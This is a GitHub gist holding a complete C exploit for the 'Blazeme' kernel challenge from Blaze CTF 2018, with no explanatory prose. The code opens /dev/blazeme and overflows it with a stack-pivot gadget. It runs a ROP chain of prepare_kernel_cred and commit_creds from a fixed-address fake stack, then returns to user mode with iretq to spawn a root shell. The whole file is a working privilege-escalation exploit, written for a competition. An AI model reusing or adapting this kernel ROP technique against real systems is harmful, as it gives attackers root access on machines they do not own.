Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exp.c

Created Nov 26, 2018
Embed
What would you like to do?
Blaze CTF 2018 Blazeme
// gcc -fno-builtin -static -nostdlib -masm=intel exp.c -o exp
#define O_RDWR 0x0002
#define KBUF_LEN (64)
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define MAP_PRIVATE 0x02 /* Changes are private. */
#define MAP_ANONYMOUS 0x20 /* Don't use a file. */
#define MAP_POPULATE 0x8000
#define MAP_FIXED 0x10
#define MAP_GROWSDOWN 0x0100
// syscalls
void exit(int e) {
__asm__("mov rax, 60");
__asm__("syscall");
__builtin_unreachable();
}
int read(int fd, char* buf, int size) {
__asm__("mov rax, 0");
__asm__("syscall");
}
int write(int fd, char* buf, int size) {
__asm__("mov rax, 1");
__asm__("syscall");
}
int open(char* pathname, int flags) {
__asm__("mov rax, 2");
__asm__("syscall");
}
int close(unsigned int fd) {
__asm__("mov rax, 3");
__asm__("syscall");
}
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
__asm__("mov r10, rcx");
__asm__("mov rax, 9");
__asm__("syscall");
}
int execve(char *filename, char *const argv[], char *const envp[]) {
__asm__("mov rax, 59");
__asm__("syscall");
}
// helper functions
unsigned long strlen(char* buf) {
unsigned long i = 0;
while( buf[i] != '\x00') {
i++;
}
return i;
}
void puts(char *buf) {
write(1, buf, strlen(buf));
write(1, "\n", 1);
}
void memset(char* s, int c, unsigned long len) {
unsigned long i;
for (i=0; i<len; i++)
s[i] = c;
}
static void shell() {
char *args[] = { "/bin/sh", 0 };
execve("/bin/sh", args, 0);
exit(0);
}
// ffffffff81063b50 T prepare_kernel_cred
// ffffffff81063960 T commit_creds
// 0xffffffff8109c604: mov esp, 0x01740000 ; ret ; (1 found)
// 0xffffffff811664cc: pop rdi ; ret ; (27 found)
// 0xffffffff81085026: mov rdi, rax ; call rdx ; (12 found)
// 0xffffffff81148e10: pop rdx ; ret ; (19 found)
// 0xffffffff811d20dd: xor rax, rax ; ret ; (26 found)
unsigned long prepare_kernel_cred = 0xffffffff81063b50;
unsigned long commit_creds = 0xffffffff81063960;
unsigned long pop_rdx = 0xffffffff81148e10;
unsigned long pop_rdi = 0xffffffff811664cc;
unsigned long mov_rdi_rax_call_rdx = 0xffffffff81085026;
unsigned long xor_rax_ret = 0xffffffff811d20dd;
unsigned long pivot_gadget = 0xffffffff8109c604;
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long shell_v = shell;
static void save_state() {
__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));
__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));
__asm__("pushfq");
__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));
}
static void restore_state() {
__asm__("swapgs");
__asm__("mov [rsp+0x20], %0": "r=" (user_ss) : "r" (user_ss));
__asm__("mov rax, 0x01740000");
__asm__("mov [rsp+0x18], rax");
__asm__("mov [rsp+0x10], %0": "r=" (user_rflags) : "r" (user_rflags));
__asm__("mov [rsp+0x08], %0": "r=" (user_cs) : "r" (user_cs));
__asm__("mov [rsp+0x00], %0": "r=" (shell_v) : "r" (shell_v));
__asm__("iretq");
}
void _start(void) {
int fd;
char buf[KBUF_LEN];
int i;
unsigned long* fake_stack;
save_state();
fd = open("/dev/blazeme", O_RDWR);
if (fd < 0) {
puts("open() failure");
exit(1);
}
fake_stack = mmap(0x01740000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
fake_stack += (0x1000/ sizeof(unsigned long));
*fake_stack ++= pop_rdi;
*fake_stack ++= 0;
*fake_stack ++= prepare_kernel_cred;
*fake_stack ++= pop_rdx;
*fake_stack ++= commit_creds + 6;
*fake_stack ++= mov_rdi_rax_call_rdx;
*fake_stack ++= xor_rax_ret;
*fake_stack ++= restore_state;
memset(buf, 'a', 2);
for (i = 0; i<KBUF_LEN/8 ; i++) {
unsigned long *p = (unsigned long*)(buf+2+i*8);
*p = pivot_gadget;
}
while (1) {
write(fd, buf, KBUF_LEN);
}
exit(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.